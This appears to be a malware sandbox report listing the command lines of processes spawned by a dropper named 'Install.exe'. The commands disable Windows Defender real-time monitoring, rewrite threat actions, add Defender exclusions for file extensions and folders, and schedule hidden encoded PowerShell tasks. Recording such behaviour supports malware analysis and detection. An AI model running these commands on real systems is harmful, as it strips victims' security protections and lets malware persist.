PID 2444 wrote to memory of 1724 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2444 wrote to memory of 1724 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2444 wrote to memory of 1724 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2444 wrote to memory of 1724 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2444 wrote to memory of 1724 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2444 wrote to memory of 1724 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2444 wrote to memory of 1724 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1724 wrote to memory of 2560 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1724 wrote to memory of 2560 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1724 wrote to memory of 2560 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1724 wrote to memory of 2560 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1724 wrote to memory of 2560 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1724 wrote to memory of 2560 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1724 wrote to memory of 2560 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2660 wrote to memory of 2604 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe

Processes

C:\Users\Admin\AppData\Local\Temp\8f3739a48f3309a717d2010c14e4c6f7c7b4c212940024cc5937b43d7d914e10.exe

"C:\Users\Admin\AppData\Local\Temp\8f3739a48f3309a717d2010c14e4c6f7c7b4c212940024cc5937b43d7d914e10.exe"

C:\Users\Admin\AppData\Local\Temp\7zS1FFF.tmp\Install.exe

.\Install.exe

C:\Users\Admin\AppData\Local\Temp\7zS22CC.tmp\Install.exe

.\Install.exe /MQgEdidHb "525403" /S

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bqHlMUmkmlcBkJQYdf" /SC once /ST 23:34:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\dCtMvmKVJeporrZwH\dMonoOYAZKifzjw\vtLGwLO.exe\" Dh /KCtdidohrV 525403 /S" /V1 /F

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bqHlMUmkmlcBkJQYdf"

C:\Windows\SysWOW64\cmd.exe

/C schtasks /run /I /tn bqHlMUmkmlcBkJQYdf

\??\c:\windows\SysWOW64\schtasks.exe

schtasks /run /I /tn bqHlMUmkmlcBkJQYdf

C:\Windows\system32\taskeng.exe

taskeng.exe {462BCC95-0DA6-44D2-8FF6-A4A34A48868C} S-1-5-18:NT AUTHORITY\System:Service:

C:\Users\Admin\AppData\Local\Temp\dCtMvmKVJeporrZwH\dMonoOYAZKifzjw\vtLGwLO.exe

C:\Users\Admin\AppData\Local\Temp\dCtMvmKVJeporrZwH\dMonoOYAZKifzjw\vtLGwLO.exe Dh /KCtdidohrV 525403 /S

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gUPKlASor" /SC once /ST 19:46:42 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gUPKlASor"

C:\Windows\system32\taskeng.exe

taskeng.exe {0687DDEC-768B-4780-B380-5297C0E08198} S-1-5-21-1298544033-3225604241-2703760938-1000:IZKCKOTP\Admin:Interactive:[1]

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gUPKlASor"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gRvAzpxhL" /SC once /ST 15:08:10 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gRvAzpxhL"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gRvAzpxhL"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\LHhfOSCKsioeHeSb" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\LHhfOSCKsioeHeSb" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\LHhfOSCKsioeHeSb" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\LHhfOSCKsioeHeSb" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\LHhfOSCKsioeHeSb" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\LHhfOSCKsioeHeSb" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\LHhfOSCKsioeHeSb" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\LHhfOSCKsioeHeSb" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\cmd.exe

cmd /C copy nul "C:\Windows\Temp\LHhfOSCKsioeHeSb\VJcdqYuV\rMQBgWXPfZzSHRhK.wsf"

C:\Windows\SysWOW64\wscript.exe

wscript "C:\Windows\Temp\LHhfOSCKsioeHeSb\VJcdqYuV\rMQBgWXPfZzSHRhK.wsf"

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BspasHMSlPUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BspasHMSlPUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JbudRisgU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JbudRisgU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KDIdGNeaPBYNADfhwFR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KDIdGNeaPBYNADfhwFR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VloXEwfyUAdsC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VloXEwfyUAdsC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zpocSIDFTSWU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zpocSIDFTSWU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\SRtRtaafQKnfEXVB" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\SRtRtaafQKnfEXVB" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\dCtMvmKVJeporrZwH" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\dCtMvmKVJeporrZwH" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\LHhfOSCKsioeHeSb" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\LHhfOSCKsioeHeSb" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BspasHMSlPUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BspasHMSlPUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JbudRisgU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JbudRisgU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KDIdGNeaPBYNADfhwFR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KDIdGNeaPBYNADfhwFR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VloXEwfyUAdsC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VloXEwfyUAdsC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zpocSIDFTSWU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zpocSIDFTSWU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\SRtRtaafQKnfEXVB" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\SRtRtaafQKnfEXVB" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\dCtMvmKVJeporrZwH" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\dCtMvmKVJeporrZwH" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\LHhfOSCKsioeHeSb" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\LHhfOSCKsioeHeSb" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gmdNzcXZw" /SC once /ST 09:25:29 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gmdNzcXZw"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

